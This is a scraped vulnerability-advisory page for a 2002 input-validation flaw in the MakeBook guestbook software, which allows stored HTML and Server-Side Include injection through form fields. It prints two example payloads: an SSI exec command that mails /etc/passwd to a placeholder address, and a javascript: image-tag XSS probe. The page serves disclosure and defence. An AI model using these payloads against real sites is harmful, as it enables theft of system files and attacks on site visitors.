header-logo
Suggest Exploit
vendor:
Guestbook Software
by:
SecurityFocus
7.5
CVSS
HIGH
Input Validation Vulnerability
20
CWE
Product Name: Guestbook Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

MakeBook Guestbook Software Input Validation Vulnerability

The MakeBook guestbook software does not sufficiently sanitize potentially dangerous characters from form field input. This may enable attackers to inject arbitrary HTML into form fields, which will be stored on guestbook pages. Additionally, it has been demonstrated that SSI (Server-Side Includes) may also be injected in this manner, and may be executed depending on the underlying environment.

Mitigation:

Input validation should be performed to ensure that user-supplied data does not contain malicious code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4996/info

The MakeBook guestbook software does not sufficiently sanitize potentially dangerous characters from form field input. This may enable attackers to inject arbitrary HTML into form fields, which will be stored on guestbook pages. Additionally, it has been demonstrated that SSI (Server-Side Includes) may also be injected in this manner, and may be executed depending on the underlying environment. 

Server-Side Include example:

Name: <!--#exec cmd="/bin/mail address@host < /etc/passwd"-->

HTML Injection example:

Name: <img src="javascript:alert('test');">

Navigation

Suggest Exploit

Services By CQR